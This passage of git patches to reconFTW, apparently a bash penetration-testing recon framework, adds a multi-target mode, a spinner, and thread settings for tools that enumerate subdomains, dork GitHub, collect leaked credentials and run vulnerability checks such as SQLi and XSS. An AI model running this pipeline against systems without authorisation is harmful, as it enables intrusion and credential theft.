case $1 in + start) + + let column=$(tput cols)-${#2}+2 + echo -ne ${2} + + printf "%${column}s" + # start spinner + i=1 + sp='⣾⣽⣻⢿⡿⣟⣯⣷' + charwidth=3 + delay=${SPINNER_DELAY:-0.15} + + while : + do + printf "\b${sp:i++%${#sp}:1}" + sleep $delay + done + ;; + stop) + if [[ -z ${1} ]]; then + echo "spinner is not running.." + exit 1 + fi + kill -9 $1 > /dev/null 2>&1 + ;; + *) + echo "invalid argument, try {start/stop}" + exit 1 + ;; + esac +} + +function start_spinner { + # $1 : msg to display + _spinner "start" & + # set global spinner pid + _sp_pid=$! + disown +} + +function stop_spinner { + # $1 : command exit status + _spinner "stop" $_sp_pid + unset _sp_pid +} + + function start(){ global_start=`date +%s` @@ -1405,7 +1269,7 @@ function start(){ then domain="Multi" dir=$SCRIPTPATH/Recon/$domain - called_fn_dir=$dir/.called + called_fn_dir=$dir/.called_fn fi if [[ "$list" = /* ]]; then install -D $list $dir/webs/webs.txt @@ -1491,10 +1355,10 @@ function end(){ function passive(){ start domain_info + emails google_dorks github_dorks metadata - emails SUBSCRAPING=false WEBPROBESIMPLE=false subdomains_full @@ -1507,10 +1371,10 @@ function passive(){ function all(){ start domain_info + emails google_dorks github_dorks metadata - emails subdomains_full subtakeover webprobe_full @@ -1526,13 +1390,13 @@ function all(){ urlchecks wordlist_gen url_gf + jschecks open_redirect ssrf_checks crlf_checks lfi ssti sqli - jschecks xss brokenLinks test_ssl @@ -1542,10 +1406,10 @@ function all(){ function recon(){ start domain_info + emails google_dorks github_dorks metadata - emails subdomains_full subtakeover webprobe_full @@ -1564,6 +1428,72 @@ function recon(){ end } +function multi_recon(){ + if [ -s "$list" ] + then + targets=$(cat $list) + else + notification "Target list not provided" error + exit + fi + workdir=$SCRIPTPATH/Recon/$multi + mkdir -p $workdir && cd $workdir + mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + for domain in $targets; do + dir=$workdir/targets/$domain + mkdir -p $dir + cd $dir + mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + domain_info + emails + google_dorks + github_dorks + metadata + subdomains_full + subtakeover + webprobe_full + screenshot + favicon + done + cd $workdir + + notification "############################# Total data ############################" info + NUMOFLINES_users_total=$(find . -type f -name 'users.txt' -exec cat {} + | anew -q osint/users.txt | wc -l) + NUMOFLINES_pwndb_total=$(find . -type f -name 'passwords.txt' -exec cat {} + | anew -q osint/passwords.txt | wc -l) + NUMOFLINES_software_total=$(find . -type f -name 'software.txt' -exec cat {} + | anew -q osint/software.txt | wc -l) + NUMOFLINES_authors_total=$(find . -type f -name 'authors.txt' -exec cat {} + | anew -q osint/authors.txt | wc -l) + NUMOFLINES_subs_total=$(find . -type f -name 'subdomains.txt' -exec cat {} + | anew -q subdomains/subdomains.txt | wc -l) + NUMOFLINES_subtko_total=$(find . -type f -name 'takeover.txt' -exec cat {} + | anew -q webs/takeover.txt | wc -l) + NUMOFLINES_webs_total=$(find . -type f -name 'webs.txt' -exec cat {} + | anew -q webs/webs.txt | wc -l) + NUMOFLINES_webs_total=$(find . -type f -name 'webs_uncommon_ports.txt' -exec cat {} + | anew -q webs/webs_uncommon_ports.txt | wc -l) + + notification "- ${NUMOFLINES_users_total} total users found" good + notification "- ${NUMOFLINES_pwndb_total} total creds leaked" good + notification "- ${NUMOFLINES_software_total} total software found" good + notification "- ${NUMOFLINES_authors_total} total authors found" good + notification "- ${NUMOFLINES_subs_total} total subdomains" good + notification "- ${NUMOFLINES_subtko_total} total probably subdomain takeovers" good + notification "- ${NUMOFLINES_webs_total} total websites" good + + portscan + waf_checks + nuclei_check + for domain in $targets; do + dir=$workdir/targets/$domain + cd $dir + cms_scanner + fuzz + params + urlchecks + wordlist_gen + url_gf + jschecks + done + cd $workdir + dir=$workdir + end +} + function subs_menu(){ start subdomains_full @@ -1615,12 +1545,12 @@ banner if [ -z "$1" ] then - help - tools_installed - exit + help + tools_installed + exit fi -while getopts ":hd:-:l:x:varspxwo:" opt; do +while getopts ":hd:-:l:m:x:varspxwo:" opt; do general=$@ if [[ $general == *"-v"* ]]; then unset DEBUG_STD @@ -1633,6 +1563,11 @@ while getopts ":hd:-:l:x:varspxwo:" opt; do FULLSCOPE=true fi case ${opt} in + + ## TARGETS + + m ) multi=$OPTARG + ;; d ) domain=$OPTARG ;; l ) list=$OPTARG @@ -1645,7 +1580,15 @@ while getopts ":hd:-:l:x:varspxwo:" opt; do exit fi ;; - r ) if [ -n "$list" ] + + ## MODES + + r ) if [ ! -z "$multi" ] + then + multi_recon + exit + fi + if [ -n "$list" ] then for domain in $(cat $list); do recon From 0e0182796f36f23bedc0f8e563eaef0aa4b08282 Mon Sep 17 00:00:00 2001 From: six2dez Date: Fri, 12 Mar 2021 14:54:42 +0100 Subject: [PATCH 2/3] Colour spinner --- install.sh | 6 +++--- reconftw.sh | 28 ++++------------------------ 2 files changed, 7 insertions(+), 27 deletions(-) diff --git a/install.sh b/install.sh index ce15a584..441adc3f 100755 --- a/install.sh +++ b/install.sh @@ -28,16 +28,16 @@ printf "${bgreen} reconFTW installer script ${reset}\n\n" install_apt(){ eval $SUDO apt install chromium-browser -y $DEBUG_STD eval $SUDO apt install chromium -y $DEBUG_STD - eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor -y $DEBUG_STD + eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor lolcat -y $DEBUG_STD eval $SUDO systemctl enable tor $DEBUG_STD } install_yum(){ - eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan -y $DEBUG_STD + eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan lolcat -y $DEBUG_STD } install_pacman(){ - eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq xorg-server-xvfb tor lynx -y $DEBUG_STD + eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq xorg-server-xvfb tor lynx lolcat -y $DEBUG_STD eval $SUDO systemctl enable --now tor.service $DEBUG_STD } diff --git a/reconftw.sh b/reconftw.sh index 6edc7d58..e66246a5 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -1187,32 +1187,15 @@ function end_subfunc(){ } function _spinner() { - # $1 start/stop - # - # on start: $2 display message - # on stop : $2 process exit status - # $3 spinner function pid (supplied from stop_spinner) - - local on_success="DONE" - local on_fail="FAIL" - local white="\e[1;37m" - local green="\e[1;32m" - local red="\e[1;31m" - local nc="\e[0m" case $1 in start) - let column=$(tput cols)-${#2}+2 echo -ne ${2} - printf "%${column}s" - # start spinner i=1 sp='⣾⣽⣻⢿⡿⣟⣯⣷' - charwidth=3 delay=${SPINNER_DELAY:-0.15} - while : do printf "\b${sp:i++%${#sp}:1}" @@ -1224,7 +1207,8 @@ function _spinner() { echo "spinner is not running.." exit 1 fi - kill -9 $1 > /dev/null 2>&1 + kill $2 > /dev/null 2>&1 + echo -en "\b " ;; *) echo "invalid argument, try {start/stop}" @@ -1234,20 +1218,16 @@ function _spinner() { } function start_spinner { - # $1 : msg to display - _spinner "start" & - # set global spinner pid + _spinner "start" "${1}" | lolcat & _sp_pid=$! disown } function stop_spinner { - # $1 : command exit status - _spinner "stop" $_sp_pid + _spinner "stop" $1 $_sp_pid unset _sp_pid } - function start(){ global_start=`date +%s` From 6867f37667c11e9633a648d2db0d91e59fe4336e Mon Sep 17 00:00:00 2001 From: six2dez Date: Sat, 13 Mar 2021 02:55:10 +0100 Subject: [PATCH 3/3] Fixes and threads control --- install.sh | 6 +- reconftw.cfg | 13 ++- reconftw.sh | 228 +++++++++++++++++---------------------------------- 3 files changed, 87 insertions(+), 160 deletions(-) diff --git a/install.sh b/install.sh index 441adc3f..ce15a584 100755 --- a/install.sh +++ b/install.sh @@ -28,16 +28,16 @@ printf "${bgreen} reconFTW installer script ${reset}\n\n" install_apt(){ eval $SUDO apt install chromium-browser -y $DEBUG_STD eval $SUDO apt install chromium -y $DEBUG_STD - eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor lolcat -y $DEBUG_STD + eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor -y $DEBUG_STD eval $SUDO systemctl enable tor $DEBUG_STD } install_yum(){ - eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan lolcat -y $DEBUG_STD + eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan -y $DEBUG_STD } install_pacman(){ - eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq xorg-server-xvfb tor lynx lolcat -y $DEBUG_STD + eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq xorg-server-xvfb tor lynx -y $DEBUG_STD eval $SUDO systemctl enable --now tor.service $DEBUG_STD } diff --git a/reconftw.cfg b/reconftw.cfg index 2ac2ff4c..c6655068 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -91,12 +91,21 @@ FULLSCOPE=false DIFF=false REMOVETMP=false -## HTTP options +# HTTP options COOKIE="" HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" +# Threads +FFUF_THREADS=40 +HTTPX_THREADS=50 +HTTPX_UNCOMMONPORTS_THREADS=150 +SHUFFLEDNS_THREADS=5000 +GOSPIDER_THREADS=50 +GITDORKER_THREADS=5 +XSSTRIKE_THREADS=30 + # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt subs_wordlist=${tools}/subdomains.txt -resolvers=${tools}/resolvers.txt +resolvers=${tools}/resolvers.txt \ No newline at end of file diff --git a/reconftw.sh b/reconftw.sh index e66246a5..e82e9f35 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -102,7 +102,7 @@ function google_dorks(){ end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]} else if [ "$GOOGLE_DORKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -116,9 +116,9 @@ function github_dorks(){ if [ -s "${GITHUB_TOKENS}" ] then if [ "$DEEP" = true ] ; then - eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e 5 -q $domain -p -d $tools/GitDorker/Dorks/alldorksv3 | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD + eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/alldorksv3 | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD else - eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e 5 -q $domain -p -d $tools/GitDorker/Dorks/medium_dorks.txt | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD + eval python3 $tools/GitDorker/GitDorker.py -tf ${GITHUB_TOKENS} -e $GITDORKER_THREADS -q $domain -p -d $tools/GitDorker/Dorks/medium_dorks.txt | grep "\[+\]" | grep "git" | anew -q osint/gitdorks.txt $DEBUG_STD fi sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/gitdorks.txt else @@ -127,7 +127,7 @@ function github_dorks(){ end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]} else if [ "$GITHUB_DORKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -145,7 +145,7 @@ function metadata(){ end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]} else if [ "$METADATA" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -183,7 +183,7 @@ function emails(){ end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]} else if [ "$EMAILS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -212,21 +212,21 @@ function domain_info(){ if [ -s ".tmp/domain_registrant_email.txt" ] then - for sub in $(cat .tmp/domain_registrant_email.txt); do + for line in $(cat .tmp/domain_registrant_email.txt); do lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_email.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_email.txt done fi if [ -s ".tmp/domain_registrant_ip.txt" ] then - for sub in $(cat .tmp/domain_registrant_ip.txt); do + for line in $(cat .tmp/domain_registrant_ip.txt); do lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_ip.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_ip.txt done fi end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]} else if [ "$DOMAIN_INFO" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -282,8 +282,6 @@ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Passive Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Passive Subdomain Enumeration${reset}\n\n" eval subfinder -d $domain -o .tmp/subfinder.txt $DEBUG_STD eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder.txt eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass.txt $DEBUG_STD @@ -292,10 +290,6 @@ function sub_passive(){ timeout 5m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls.txt NUMOFLINES=$(eval cat .tmp/subfinder.txt .tmp/assetfinder.txt .tmp/amass.txt .tmp/findomain.txt .tmp/crobat.txt .tmp/waybackurls.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains found with passive techniques in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -305,8 +299,6 @@ function sub_crt(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBCRT" = true ] then start_subfunc "Running : Crtsh Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Crtsh Subdomain Enumeration${reset}\n\n" cd $tools/crtfinder eval python3 crtfinder.py -u $domain $DEBUG_STD outputfile=${domain%%.*} @@ -336,12 +328,9 @@ function sub_crt(){ touch $called_fn_dir/.${FUNCNAME[0]} NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | anew .tmp/crtsh_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by certificate transparency found in ${runtime}" good else if [ "$SUBCRT" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -352,18 +341,12 @@ function sub_brute(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBBRUTE" = true ] then start_subfunc "Running : Bruteforce Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Bruteforce Subdomain Enumeration${reset}\n\n" - eval shuffledns -d $domain -w $subs_wordlist -r $resolvers -t 5000 -o .tmp/active_tmp.txt $DEBUG_STD + eval shuffledns -d $domain -w $subs_wordlist -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/active_tmp.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/active_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/brute_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by bruteforce found in ${runtime}" good else if [ "$SUBBRUTE" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -374,20 +357,14 @@ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Active Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Active Subdomain Enumeration${reset}\n\n" cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt - eval shuffledns -d $domain -list .tmp/subs_no_resolved.txt -r $resolvers -t 5000 -o .tmp/subdomains_tmp.txt $DEBUG_STD + eval shuffledns -d $domain -list .tmp/subs_no_resolved.txt -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/subdomains_tmp.txt $DEBUG_STD echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt dnsx -retry 3 -silent -cname -resp-only -l .tmp/subdomains_tmp.txt | grep ".$domain$" | anew -q .tmp/subdomains_tmp.txt eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by dns resolution found in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -397,21 +374,15 @@ function sub_scraping(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBSCRAPING" = true ] then start_subfunc "Running : Source code scraping subdomain search" - #start=`date +%s` - #printf "${yellow} Running : Source code scraping subdomain search${reset}\n\n" touch .tmp/scrap_subs.txt - cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt - gospider -S .tmp/probed_tmp.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt - cat .tmp/scrap_subs.txt | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/scrap_subs_resolved.txt $DEBUG_STD + cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt + gospider -S .tmp/probed_tmp.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt + cat .tmp/scrap_subs.txt | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/scrap_subs_resolved.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by scraping found in ${runtime}" good else if [ "$SUBSCRAPING" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -422,30 +393,28 @@ function sub_permut(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBPERMUTE" = true ] then start_subfunc "Running : Permutations Subdomain Enumeration" - #start=`date +%s` - #printf "${yellow} Running : Permutations Subdomain Enumeration${reset}\n\n" if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 50 ]] then - eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute1_tmp.txt $DEBUG_STD + eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute1_tmp.txt $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt - eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute2_tmp.txt $DEBUG_STD + eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute2_tmp.txt $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]] then - eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute_tmp.txt $DEBUG_STD + eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute_tmp.txt $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat subdomains/subdomains.txt | wc -l) -le 50 ]] then - eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute1_tmp.txt $DEBUG_STD + eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute1_tmp.txt $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt - eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute2_tmp.txt $DEBUG_STD + eval dnsgen .tmp/permute1.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute2_tmp.txt $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat subdomains/subdomains.txt | wc -l) -le 100 ]] then - eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute_tmp.txt $DEBUG_STD + eval dnsgen subdomains/subdomains.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t $SHUFFLEDNS_THREADS -o .tmp/permute_tmp.txt $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n" @@ -459,13 +428,9 @@ function sub_permut(){ NUMOFLINES=0 fi end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new subdomains by permutations found in ${runtime}" good else if [ "$SUBPERMUTE" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -485,7 +450,7 @@ function subtakeover(){ end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]} else if [ "$SUBTAKEOVER" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -500,17 +465,13 @@ function webprobe_simple(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBESIMPLE" = true ] then start_subfunc "Running : Http probing" - cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt + cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} - #touch $called_fn_dir/.${FUNCNAME[0]} - #end=`date +%s` - #getElapsedTime $start $end - #notification "${NUMOFLINES} new websites resolved in ${runtime}" good else if [ 